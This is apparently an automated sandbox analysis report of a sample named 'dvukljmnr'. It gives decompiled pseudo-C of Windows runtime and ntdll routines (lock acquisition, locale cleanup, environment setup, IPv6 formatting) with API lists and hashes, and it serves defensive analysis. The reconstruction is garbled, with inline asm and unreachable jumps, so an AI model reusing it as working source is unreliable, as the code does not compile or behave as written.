                                                          										__eflags = _t56;
                                                          										if(_t56 != 0) {
                                                          											L40:
                                                          											_t128 = 0;
                                                          											__eflags = 0;
                                                          											while(1) {
                                                          												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                          												asm("sbb esi, esi");
                                                          												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
                                                          												_push(_t138);
                                                          												_push(0);
                                                          												_t58 = L009FF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                          												__eflags = _t58 - 0x102;
                                                          												if(_t58 != 0x102) {
                                                          													break;
                                                          												}
                                                          												_t107 =  *(_t138 + 4);
                                                          												_t125 =  *_t138;
                                                          												_t75 = L00A44FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                          												_push(_t125);
                                                          												_push(_t75);
                                                          												L00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                          												L00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                          												_t128 = _t128 + 1;
                                                          												_t159 = _t158 + 0x28;
                                                          												__eflags = _t128 - 2;
                                                          												if(__eflags > 0) {
                                                          													E00A8217A(_t107, __eflags, _t96);
                                                          												}
                                                          												_push("RTL: Re-Waiting\n");
                                                          												_push(0);
                                                          												_push(0x65);
                                                          												L00A53F92();
                                                          												_t158 = _t159 + 0xc;
                                                          											}
                                                          											__eflags = _t58;
                                                          											if(__eflags < 0) {
                                                          												_push(_t58);
                                                          												L00A43915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                          												asm("int3");
                                                          												_t61 =  *_t107;
                                                          												 *_t107 = 0;
                                                          												__eflags = _t61;
                                                          												if(_t61 == 0) {
                                                          													L1:
                                                          													_t63 = E00A25384(_t138 + 0x24);
                                                          													if(_t63 != 0) {
                                                          														goto L52;
                                                          													} else {
                                                          														goto L2;
                                                          													}
                                                          												} else {
                                                          													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                          													_push( &_a4);
                                                          													_push(_t61);
                                                          													_t70 = L009FF970( *((intOrPtr*)(_t138 + 0x18)));
                                                          													__eflags = _t70;
                                                          													if(__eflags >= 0) {
                                                          														goto L1;
                                                          													} else {
                                                          														_push(_t70);
                                                          														L00A43915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                          														L52:
                                                          														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                          														_push( &_a4);
                                                          														_push(1);
                                                          														_t63 = L009FF970( *((intOrPtr*)(_t138 + 0x20)));
                                                          														__eflags = _t63;
                                                          														if(__eflags >= 0) {
                                                          															L2:
                                                          															return _t63;
                                                          														} else {
                                                          															_push(_t63);
                                                          															L00A43915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                          															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                          															_push( &_a4);
                                                          															_push(1);
                                                          															_t63 = L009FF970( *((intOrPtr*)(_t138 + 0x20)));
                                                          															__eflags = _t63;
                                                          															if(__eflags >= 0) {
                                                          																goto L2;
                                                          															} else {
                                                          																_push(_t63);
                                                          																_t66 = L00A43915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                          																asm("int3");
                                                          																while(1) {
                                                          																	_t110 = _t66;
                                                          																	__eflags = _t66 - 1;
                                                          																	if(_t66 != 1) {
                                                          																		break;
                                                          																	}
                                                          																	_t128 = _t128 | 0xffffffff;
                                                          																	_t66 = _t110;
                                                          																	asm("lock cmpxchg [ebx], edi");
                                                          																	__eflags = _t66 - _t110;
                                                          																	if(_t66 != _t110) {
                                                          																		continue;
                                                          																	} else {
                                                          																		_t67 =  *[fs:0x18];
                                                          																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                          																		return _t67;
                                                          																	}
                                                          																	goto L59;
                                                          																}
                                                          																E00A25329(_t110, _t138);
                                                          																_t69 = E00A253A5(_t138, 1);
                                                          																return _t69;
                                                          															}
                                                          														}
                                                          													}
                                                          												}
                                                          											} else {
                                                          												_t56 =  *(_t96 + 0x28);
                                                          												goto L3;
                                                          											}
                                                          										} else {
                                                          											_t107 =  *_t119;
                                                          											__eflags = _t107;
                                                          											if(__eflags > 0) {
                                                          												while(1) {
                                                          													_t81 = _t107;
                                                          													asm("lock cmpxchg [edi], esi");
                                                          													__eflags = _t81 - _t107;
                                                          													if(_t81 == _t107) {
                                                          														break;
                                                          													}
                                                          													_t107 = _t81;
                                                          													__eflags = _t81;
                                                          													if(_t81 > 0) {
                                                          														continue;
                                                          													}
                                                          													break;
                                                          												}
                                                          												_t56 = _a4;
                                                          												__eflags = _t107;
                                                          											}
                                                          											if(__eflags != 0) {
                                                          												while(1) {
                                                          													L3:
                                                          													__eflags = _t56;
                                                          													if(_t56 != 0) {
                                                          														goto L32;
                                                          													}
                                                          													_t107 = _t107 | 0xffffffff;
                                                          													_t56 = 0;
                                                          													asm("lock cmpxchg [edx], ecx");
                                                          													__eflags = 0;
                                                          													if(0 != 0) {
                                                          														continue;
                                                          													} else {
                                                          														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                          														return 1;
                                                          													}
                                                          													goto L59;
                                                          												}
                                                          												continue;
                                                          											} else {
                                                          												goto L40;
                                                          											}
                                                          										}
                                                          										goto L59;
                                                          									}
                                                          									__eflags = 0;
                                                          									return 0;
                                                          								} else {
                                                          									_t115 =  *(_t96 + 0x28);
                                                          									continue;
                                                          								}
                                                          							} else {
                                                          								_t106 =  *_t49;
                                                          								__eflags = _t106;
                                                          								if(__eflags > 0) {
                                                          									while(1) {
                                                          										_t93 = _t106;
                                                          										asm("lock cmpxchg [edi], esi");
                                                          										__eflags = _t93 - _t106;
                                                          										if(_t93 == _t106) {
                                                          											break;
                                                          										}
                                                          										_t106 = _t93;
                                                          										__eflags = _t93;
                                                          										if(_t93 > 0) {
                                                          											continue;
                                                          										}
                                                          										break;
                                                          									}
                                                          									__eflags = _t106;
                                                          								}
                                                          								if(__eflags != 0) {
                                                          									continue;
                                                          								} else {
                                                          									goto L23;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L59;
                                                          					}
                                                          					_t84 = _t115;
                                                          					asm("lock cmpxchg [esi], ecx");
                                                          					__eflags = _t84 - _t115;
                                                          					if(_t84 != _t115) {
                                                          						_t115 = _t84;
                                                          						goto L7;
                                                          					} else {
                                                          						return 1;
                                                          					}
                                                          				}
                                                          				L59:
                                                          			}





































                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A62206
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-4236105082
                                                          • Opcode ID: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
                                                          • Instruction ID: f510b12933ad2fa97dbec47dec43746e63c9951263ebfc88f77ee9bb51981f30
                                                          • Opcode Fuzzy Hash: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
                                                          • Instruction Fuzzy Hash: EE513776B046016BEB148B28CC81FA633B9AFD8721F218229FD19DF285DA71EC458790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E009A5649(intOrPtr* __eax, short __ebx, void* __ecx, void* __edx, intOrPtr* __esi) {
                                                          				void* _t45;
                                                          				signed int _t47;
                                                          				intOrPtr* _t51;
                                                          				void* _t59;
                                                          				signed short _t60;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				void* _t64;
                                                          				void* _t71;
                                                          				void* _t78;
                                                          				void* _t80;
                                                          				void* _t95;
                                                          				intOrPtr* _t98;
                                                          				void* _t99;
                                                          				signed int _t100;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t106;
                                                          				void* _t107;
                                                          				void* _t108;
                                                          				void* _t109;
                                                          				void* _t123;
                                                          
                                                          				_t97 = __esi;
                                                          				_t93 = __edx;
                                                          				_t79 = __ebx;
                                                          				asm("adc eax, [ecx+0x682af3]");
                                                          				 *((intOrPtr*)(__ecx + 0x5be9f3)) =  *((intOrPtr*)(__ecx + 0x5be9f3)) + __eax;
                                                          				 *((intOrPtr*)(__ecx + 0xa881e9)) =  *((intOrPtr*)(__ecx + 0xa881e9)) + __eax;
                                                          				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __ecx;
                                                          				 *__eax =  *__eax + __eax;
                                                          				_t103 = _t102 + 0xc;
                                                          				if(__eax == 0) {
                                                          					if(E009BA06A(__esi) == 0) {
                                                          						if(E009B5727( *((intOrPtr*)(_t100 - 0x1e8)), 0x55, __ebx, E009B5609(__ebx) + 1) != 0) {
                                                          							goto L28;
                                                          						} else {
                                                          							goto L2;
                                                          						}
                                                          					} else {
                                                          						_t59 = E009B9FDB(__esi, 0x20001004, _t100 - 0x1dc, 2);
                                                          						_t106 = _t103 + 0x10;
                                                          						if(_t59 == 0) {
                                                          							L11:
                                                          							_t60 = GetACP();
                                                          							 *(_t100 - 0x1dc) = _t60;
                                                          						} else {
                                                          							_t60 =  *(_t100 - 0x1dc);
                                                          							if(_t60 == 0) {
                                                          								goto L11;
                                                          							}
                                                          						}
                                                          						 *_t94 = _t60 & 0x0000ffff;
                                                          						_t94 =  *((intOrPtr*)(_t100 - 0x1e4)) + 1;
                                                          						_t62 = E009B5727( *((intOrPtr*)(_t100 - 0x1d4)), 0x83, _t97,  *((intOrPtr*)(_t100 - 0x1e4)) + 1);
                                                          						_t107 = _t106 + 0x10;
                                                          						if(_t62 != 0) {
                                                          							goto L28;
                                                          						} else {
                                                          							_t63 = E009B5727(_t79,  *((intOrPtr*)(_t100 + 0x18)), _t97, _t94);
                                                          							_t108 = _t107 + 0x10;
                                                          							if(_t63 != 0) {
                                                          								goto L28;
                                                          							} else {
                                                          								_t64 = E009B5727( *((intOrPtr*)(_t100 - 0x1e8)), 0x55, _t97, _t94);
                                                          								_t109 = _t108 + 0x10;
                                                          								if(_t64 != 0) {
                                                          									goto L28;
                                                          								} else {
                                                          									_t94 = 0x83;
                                                          									goto L16;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				} else {
                                                          					_t94 = 0x83;
                                                          					_push(_t100 - 0x1d0);
                                                          					E009B7294(__ebx, __ecx, __edx, 0x83, _t123,  *((intOrPtr*)(_t100 - 0x1d4)), 0x83);
                                                          					_t109 = _t103 + 0xc;
                                                          					if(__ebx == 0) {
                                                          						L16:
                                                          						_t79 = 0;
                                                          						if( *_t97 == 0) {
                                                          							L20:
                                                          							 *((short*)( *((intOrPtr*)(_t100 - 0x1e0)))) = 0;
                                                          							goto L21;
                                                          						} else {
                                                          							_t69 =  *((intOrPtr*)(_t100 - 0x1e4));
                                                          							if( *((intOrPtr*)(_t100 - 0x1e4)) >= _t94) {
                                                          								goto L20;
                                                          							} else {
                                                          								_t71 = E009B5727( *((intOrPtr*)(_t100 - 0x1e0)), _t94, _t97, _t69 + 1);
                                                          								_t109 = _t109 + 0x10;
                                                          								if(_t71 == 0) {
                                                          									L21:
                                                          									_t94 =  *(_t100 - 0x1f0);
                                                          									if(_t94 != 0) {
                                                          										E009B32E0(_t94,  *((intOrPtr*)(_t100 - 0x1d8)), 4);
                                                          										_t109 = _t109 + 0xc;
                                                          									}
                                                          									_t79 =  *((intOrPtr*)(_t100 - 0x1d4));
                                                          									_t97 =  *((intOrPtr*)(_t100 - 0x1ec));
                                                          									if(E009B55AD( *((intOrPtr*)(_t100 - 0x1ec)),  *((intOrPtr*)(_t100 + 0x10)),  *((intOrPtr*)(_t100 - 0x1d4))) != 0) {
                                                          										goto L28;
                                                          									} else {
                                                          										L2:
                                                          										_pop(_t95);
                                                          										_pop(_t99);
                                                          										_pop(_t80);
                                                          										return E009B1E0D(_t80,  *(_t100 - 4) ^ _t100, _t93, _t95, _t99);
                                                          									}
                                                          								} else {
                                                          									_push(0);
                                                          									_push(0);
                                                          									_push(0);
                                                          									_push(0);
                                                          									_push(0);
                                                          									goto L29;
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t78 = E009B5727(__ebx,  *((intOrPtr*)(_t100 + 0x18)), _t100 - 0xb0, E009B5609(_t100 - 0xb0) + 1);
                                                          						_t109 = _t109 + 0x14;
                                                          						if(_t78 == 0) {
                                                          							goto L16;
                                                          						} else {
                                                          							L28:
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push(0);
                                                          							L29:
                                                          							E009AEB49(_t79, _t93);
                                                          							asm("int3");
                                                          							_push(8);
                                                          							_push(0x9cc538);
                                                          							_t45 = E009AF1E0(_t79, _t94, _t97);
                                                          							_t98 =  *((intOrPtr*)(_t100 + 8));
                                                          							if(_t98 != 0) {
                                                          								_t47 = E009B20A9(0xd);
                                                          								 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
                                                          								if( *((intOrPtr*)(_t98 + 4)) != 0) {
                                                          									asm("lock xadd [ecx], eax");
                                                          									if((_t47 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t98 + 4)) != 0x9ceac8) {
                                                          										E009B2248( *((intOrPtr*)(_t98 + 4)));
                                                          									}
                                                          								}
                                                          								 *(_t100 - 4) = 0xfffffffe;
                                                          								E009B78AF();
                                                          								if( *_t98 != 0) {
                                                          									E009B20A9(0xc);
                                                          									 *(_t100 - 4) = 1;
                                                          									E009B4248( *_t98);
                                                          									_t51 =  *_t98;
                                                          									if(_t51 != 0 &&  *_t51 == 0 && _t51 != 0x9ce800) {
                                                          										E009B40EE(_t51);
                                                          									}
                                                          									 *(_t100 - 4) = 0xfffffffe;
                                                          									E009B78BB();
                                                          								}
                                                          								_t45 = E009B2248(_t98);
                                                          							}
                                                          							return E009AF225(_t45);
                                                          						}
                                                          					}
                                                          				}
                                                          			}


























                                                          APIs
                                                          • GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 009B76FC
                                                          • _memmove.LIBCMT ref: 009B77B2
                                                          • __invoke_watson.LIBCMT ref: 009B7807
                                                          • __lock.LIBCMT ref: 009B7826
                                                          • _free.LIBCMT ref: 009B784C
                                                          • __lock.LIBCMT ref: 009B7865
                                                          • ___removelocaleref.LIBCMT ref: 009B7874
                                                          • ___freetlocinfo.LIBCMT ref: 009B788D
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4124
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4142
                                                            • Part of subcall function 009B40EE: ___free_lconv_num.LIBCMT ref: 009B414D
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4157
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4162
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4183
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4196
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41A4
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41AF
                                                            • Part of subcall function 009B40EE: ___free_lc_time.LIBCMT ref: 009B41CD
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41D8
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4203
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B420A
                                                          • _free.LIBCMT ref: 009B78A0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$__lock$___free_lc_time___free_lconv_num___freetlocinfo___removelocaleref__invoke_watson_memmove
                                                          • String ID:
                                                          • API String ID: 936943993-0
                                                          • Opcode ID: b4b7c366daa6f6ee2bd62e072f5956348ecf630baebd4094ba1a454d3a09e311
                                                          • Instruction ID: dae69ce64a2128626101bf60fecb98a9483d1b887915a57213a6b28aead9c9f5
                                                          • Opcode Fuzzy Hash: b4b7c366daa6f6ee2bd62e072f5956348ecf630baebd4094ba1a454d3a09e311
                                                          • Instruction Fuzzy Hash: 41210971509304ABDB34ABE08F8ABE9B768AFC0330F58076DF415D6092DB35CA40C751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E009B12B6(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                          				signed int _t14;
                                                          				signed int _t15;
                                                          				signed int _t18;
                                                          				void* _t20;
                                                          				void* _t21;
                                                          				signed short* _t22;
                                                          				signed int _t23;
                                                          				void* _t24;
                                                          				void* _t30;
                                                          				signed short* _t32;
                                                          				signed int _t34;
                                                          				void* _t35;
                                                          				signed short* _t49;
                                                          				signed int _t50;
                                                          				signed short* _t53;
                                                          				signed short* _t56;
                                                          				void* _t60;
                                                          
                                                          				_t47 = __edx;
                                                          				if(_a4 != 0) {
                                                          					_push(_a24);
                                                          					_push(_a20);
                                                          					_push(_a16);
                                                          					_push(_a12);
                                                          					_push(_a8);
                                                          					_t14 = E009AEB49(__ebx, __edx);
                                                          					asm("int3");
                                                          					_push(__ebx);
                                                          					_push(__esi);
                                                          					_t53 =  *0x9cf1e4; // 0x0
                                                          					_t32 = 0;
                                                          					_push(__edi);
                                                          					_t49 = 0;
                                                          					if(_t53 != 0) {
                                                          						while(1) {
                                                          							_t15 =  *_t53 & 0x0000ffff;
                                                          							_t35 = 0x3d;
                                                          							if(_t15 == 0) {
                                                          								break;
                                                          							}
                                                          							if(_t15 != _t35) {
                                                          								_t49 = _t49 + 1;
                                                          							}
                                                          							_t53 =  &(( &(_t53[E009B5609(_t53)]))[1]);
                                                          						}
                                                          						_t9 = _t49 + 1; // 0x1
                                                          						_t14 = E009B2280(_t9, 4);
                                                          						_t50 = _t14;
                                                          						 *0x9cf20c = _t50;
                                                          						if(_t50 == 0) {
                                                          							goto L4;
                                                          						} else {
                                                          							_t56 =  *0x9cf1e4; // 0x0
                                                          							if( *_t56 == _t32) {
                                                          								L17:
                                                          								E009B2248(_t56);
                                                          								 *0x9cf1e4 = _t32;
                                                          								_t18 = 0;
                                                          								 *_t50 = _t32;
                                                          								 *0x9d0118 = 1;
                                                          								goto L18;
                                                          							} else {
                                                          								do {
                                                          									_t20 = E009B5609(_t56);
                                                          									_t10 = _t20 + 1; // 0x1
                                                          									_t34 = _t10;
                                                          									_t21 = 0x3d;
                                                          									if( *_t56 == _t21) {
                                                          										goto L15;
                                                          									} else {
                                                          										_t22 = E009B2280(_t34, 2);
                                                          										 *_t50 = _t22;
                                                          										if(_t22 == 0) {
                                                          											_t23 = E009B2248( *0x9cf20c);
                                                          											 *0x9cf20c =  *0x9cf20c & 0x00000000;
                                                          											_t18 = _t23 | 0xffffffff;
                                                          											L18:
                                                          											goto L19;
                                                          										} else {
                                                          											_t24 = E009B55AD(_t22, _t34, _t56);
                                                          											_t60 = _t60 + 0xc;
                                                          											if(_t24 != 0) {
                                                          												_push(0);
                                                          												_push(0);
                                                          												_push(0);
                                                          												_push(0);
                                                          												_push(0);
                                                          												E009AEB49(_t34, _t47);
                                                          												asm("int3");
                                                          												if(E009B15DF(3) == 1) {
                                                          													L25:
                                                          													E009B1415(_t34, _t47, _t50, _t56, 0xfc);
                                                          													return E009B1415(_t34, _t47, _t50, _t56, 0xff);
                                                          												}
                                                          												_t30 = E009B15DF(3);
                                                          												if(_t30 == 0 &&  *0x9cf540 == 1) {
                                                          													goto L25;
                                                          												}
                                                          												return _t30;
                                                          											} else {
                                                          												_t50 = _t50 + 4;
                                                          												goto L15;
                                                          											}
                                                          										}
                                                          									}
                                                          									goto L27;
                                                          									L15:
                                                          									_t56 =  &(_t56[_t34]);
                                                          									_t32 = 0;
                                                          								} while ( *_t56 != 0);
                                                          								_t56 =  *0x9cf1e4; // 0x0
                                                          								goto L17;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						L4:
                                                          						_t18 = _t14 | 0xffffffff;
                                                          						L19:
                                                          						return _t18;
                                                          					}
                                                          				} else {
                                                          					return __eax;
                                                          				}
                                                          				L27:
                                                          			}





















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __invoke_watson
                                                          • String ID:
                                                          • API String ID: 3648217671-0
                                                          • Opcode ID: 3269c9cf6f8446e023501b7c01c76f99297c0d2a5859649f39cf93f39aa54e11
                                                          • Instruction ID: 244d3da62b2419ffec7f2b83562d9ddaa1875d9bfdd12cecff67f453c29b3a35
                                                          • Opcode Fuzzy Hash: 3269c9cf6f8446e023501b7c01c76f99297c0d2a5859649f39cf93f39aa54e11
                                                          • Instruction Fuzzy Hash: E9212B77814202DFDB246FA0ED55BE673EEEF40370FA4442AF520D7490E73599409790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 62%
                                                          			E009B721D(void* __ebx, void* __edi, void* __fp0, intOrPtr _a4) {
                                                          				char* _v24;
                                                          				intOrPtr _v28;
                                                          				signed int _v36;
                                                          				signed int _v40;
                                                          				short _v300;
                                                          				void* __esi;
                                                          				void* _t15;
                                                          				void* _t17;
                                                          				signed int _t20;
                                                          				char* _t22;
                                                          				signed int _t30;
                                                          				void* _t40;
                                                          				void* _t42;
                                                          				void* _t46;
                                                          				void* _t47;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				signed int _t52;
                                                          
                                                          				if(_a4 != 0) {
                                                          					_push(__ebx);
                                                          					_t30 = E009BDBB1(_a4, 0x55);
                                                          					if(_t30 < 0x55) {
                                                          						_push(__edi);
                                                          						_t15 = E009B22C8(_t40, 2 + _t30 * 2);
                                                          						_t42 = _t15;
                                                          						if(_t42 != 0) {
                                                          							_t5 = _t30 + 1; // 0x1
                                                          							_t17 = E009B5727(_t42, _t5, _a4, _t5);
                                                          							_t52 = _t51 + 0x10;
                                                          							if(_t17 != 0) {
                                                          								_push(0);
                                                          								_push(0);
                                                          								_push(0);
                                                          								_push(0);
                                                          								_push(0);
                                                          								E009AEB49(_t30, _t40);
                                                          								asm("int3");
                                                          								_t49 = _t47;
                                                          								_push(_t49);
                                                          								_t50 = _t52;
                                                          								_t20 =  *0x9ce400; // 0xbb40e64e
                                                          								_v40 = _t20 ^ _t52;
                                                          								_t22 = _v24;
                                                          								_t45 = _v28;
                                                          								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
                                                          									E009B7973(_t30, _t40, __fp0, _t45,  &_v300);
                                                          								}
                                                          								_pop(_t46);
                                                          								return E009B1E0D(_t30, _v36 ^ _t50, _t40, _t42, _t46);
                                                          							} else {
                                                          								_t15 = _t42;
                                                          								goto L5;
                                                          							}
                                                          						} else {
                                                          							L5:
                                                          							goto L6;
                                                          						}
                                                          					} else {
                                                          						_t15 = 0;
                                                          						L6:
                                                          						return _t15;
                                                          					}
                                                          				} else {
                                                          					return 0;
                                                          				}
                                                          			}






















                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _wcsnlen
                                                          • String ID: U
                                                          • API String ID: 3628947076-3372436214
                                                          • Opcode ID: 2059437075a7f913f1c66ce3cd2a6e132816ed78907c9c8627bfdff5f5fb1e61
                                                          • Instruction ID: 73efd427173ec298428934771baec82c7c632a7b1cd68bab81f4b1dadacd6e9b
                                                          • Opcode Fuzzy Hash: 2059437075a7f913f1c66ce3cd2a6e132816ed78907c9c8627bfdff5f5fb1e61
                                                          • Instruction Fuzzy Hash: 5421EB3160C1087EEB109AE49E46FFAB3ACDBC5770F504665F918C6190FA61DE008690
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 64%
                                                          			E00A414C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                          				signed int _v8;
                                                          				char _v10;
                                                          				char _v140;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t24;
                                                          				void* _t26;
                                                          				signed int _t29;
                                                          				signed int _t34;
                                                          				signed int _t40;
                                                          				intOrPtr _t45;
                                                          				void* _t51;
                                                          				intOrPtr* _t52;
                                                          				void* _t54;
                                                          				signed int _t57;
                                                          				void* _t58;
                                                          
                                                          				_t51 = __edx;
                                                          				_t24 =  *0xae2088; // 0x75c00f1c
                                                          				_v8 = _t24 ^ _t57;
                                                          				_t45 = _a16;
                                                          				_t53 = _a4;
                                                          				_t52 = _a20;
                                                          				if(_a4 == 0 || _t52 == 0) {
                                                          					L10:
                                                          					_t26 = 0xc000000d;
                                                          				} else {
                                                          					if(_t45 == 0) {
                                                          						if( *_t52 == _t45) {
                                                          							goto L3;
                                                          						} else {
                                                          							goto L10;
                                                          						}
                                                          					} else {
                                                          						L3:
                                                          						_t28 =  &_v140;
                                                          						if(_a12 != 0) {
                                                          							_push("[");
                                                          							_push(0x41);
                                                          							_push( &_v140);
                                                          							_t29 = L00A37707();
                                                          							_t58 = _t58 + 0xc;
                                                          							_t28 = _t57 + _t29 * 2 - 0x88;
                                                          						}
                                                          						_t54 = E00A413CB(_t53, _t28);
                                                          						if(_a8 != 0) {
                                                          							_t34 = L00A37707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                          							_t58 = _t58 + 0x10;
                                                          							_t54 = _t54 + _t34 * 2;
                                                          						}
                                                          						if(_a12 != 0) {
                                                          							_t40 = L00A37707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                          							_t58 = _t58 + 0x10;
                                                          							_t54 = _t54 + _t40 * 2;
                                                          						}
                                                          						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                          						 *_t52 = _t53;
                                                          						if( *_t52 < _t53) {
                                                          							goto L10;
                                                          						} else {
                                                          							E00A02340(_t45,  &_v140, _t53 + _t53);
                                                          							_t26 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return E00A0E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                          			}

                                                          APIs
                                                          • ___swprintf_l.LIBCMT ref: 00A6EA22
                                                            • Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A4146B
                                                            • Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A41490
                                                          • ___swprintf_l.LIBCMT ref: 00A4156D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
